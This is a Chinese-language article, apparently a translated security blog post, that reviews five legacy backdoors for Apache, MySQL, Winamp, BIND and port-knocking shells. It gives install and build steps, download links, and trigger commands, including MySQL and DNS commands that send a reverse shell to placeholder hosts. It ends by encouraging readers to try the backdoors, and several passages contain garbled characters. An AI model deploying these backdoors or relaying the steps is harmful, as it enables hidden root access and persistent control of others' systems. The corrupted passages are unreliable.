目前，高級的rootkit技術可以幫助你在滲透中拿到一個shell后進行持久性控制。此外，還有供應商故意提供了一些植入后門，但那就是截然不同的故事了。盡管各式花樣翻新的技術與代碼層出不窮，可你還記得曾經用過的那些后門嗎?

本文介紹了5種遠程控制工具(Remote Administration Tools)RAT ，又稱“后門”，這完全是根據作者個人喜好挑選的。這是我進行合法滲透測試時所使用的工具，它們對于驗證滲透的持久性與測量防御手段的有效性提供了重要的幫助。

1.mod_rootme——Apache模塊后門(2004)

“mod_rootme是一個非?？岬哪K，它可以在Apache中安裝一個后門，你只需要進行一個簡單的GET請求，就可以拿到一個root權限的shell，并且在系統中沒有任何日志記錄。”

作為***的工具之一，你只需要執行一個簡單的make命令來編譯共享庫，將它復制到模塊目錄，在httpd.conf中寫入入“LoadModule rootme2_module /usr/lib/apache2/modules/mod_rootme2.so”，然后使用‘apachetl stop;apachectl start’重啟httpd后臺進程。之后，通過“GET root”命令你就得到了一個root權限的shell。

下載：https://packetstormsecurity.com/files/33652/mod_rootme-0.3.tgz.html

2.raptor_winudf.sql —— MySQL UDF后門(2004-2006)

“這是一個基于UDF(用戶定義函數)機制的MySQL后門工具?？梢杂盟鼇懋a生一個反彈shell(netcat UDF監聽80端口)或者執行一條系統命令(exec UDF)。”

對于這個后門，你可以使用一個簡單的命令‘#mysql –h x.x.x.x < raptor_winudf.sql’將后門作為一個用戶定義函數注入到MySQL中。這樣你便可以從MySQL shell執行‘mysql > select exec('ipconfig > c:\\out.txt');’命令。

這個反彈shell實現了一個有趣的功能，可以使用命令‘mysql> select netcat('y.y.y.y');’來調用，之后就會發送一個交互式shell在指定的主機(y.y.y.y)的80端口上。

下載 (Win32): http://www.0xdeadbeef.info/exploits/raptor_winudf.tgz

下載 (Linux): http://www.0xdeadbeef.info/exploits/raptor_udf2.c

截圖來源：infamoussyn

3. get_wbkdr.dll插件——Winamp播放器后門(2006)

“wbkdr是非常著名的高保真音樂播放器軟件Winamp后門的一個POC，它利用了插件接口，在24501端口中調用cmd.exe。”

下載：https://packetstormsecurity.com/files/53268/wbkdr.zip.html

4.BIND反彈shell后門(2005)

BIND是世界上***的DNS服務器軟件之一。這個后門使用了BIND未發布的補丁，是我的一個來自阿根廷的朋友開發的?；旧希枰阋詒oot用戶的身份來打補丁、編譯以及運行服務。一旦運行，用‘nslookup backdoorpassword:x.x.x.x:port target_DNS_server’ 發送一個DNS請求，將會在主機x.x.x.x的給定端口上觸發一個反彈shell。

5.Knock-out—— 基于端口敲門(port-knocking)的后門

這是我使用數據包嗅探庫libpcap(服務器)和數據包構造庫libnet(客戶端)制作的后門。我運用了端口敲門技術，它可以是一個綁定端口的shell也可以是一個反彈型的shell。服務器與客戶端使用相同的配置文件來決定使用哪些端口以及發送每個網絡包時間所需要的時間差。Knock-out支持TCP和UDP，并且最近在Linux主機中仍然可以工作(測試系統Ubuntu Server 14.04)。

下載：https://packetstormsecurity.com/files/52834/knock-out.tar.gz.html

作者寄語

這些后門至今仍然有效，或許你可以嘗試一下。同時，我鼓勵大家與我們分享你見過的有趣的后門、你喜歡的后門、你用過的最特別的后門以及你所鐘愛的后門。別忘了在Twitter上使用#oldschoolbackdoors(老式后門)標簽!